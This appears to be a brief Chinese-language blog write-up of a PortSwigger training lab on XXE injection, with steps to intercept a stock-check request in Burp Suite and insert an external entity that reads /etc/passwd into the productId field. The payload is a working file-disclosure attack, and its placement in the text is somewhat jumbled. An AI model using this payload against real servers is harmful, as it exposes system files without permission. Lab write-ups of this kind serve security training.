利用 XXE 使用外部实体检索文件
lab
实验室:利用外部实体检索文件 XXE |网络安全学院 (portswigger.net)
solve
- 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
在 XML 声明和元素之间插入以下外部实体定义:
stockCheck<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>- 将该数字替换为对外部实体的引用:。响应应包含“产品 ID:”,后跟文件内容。
productId`&xxe;`/etc/passwd
评论0
暂时没有评论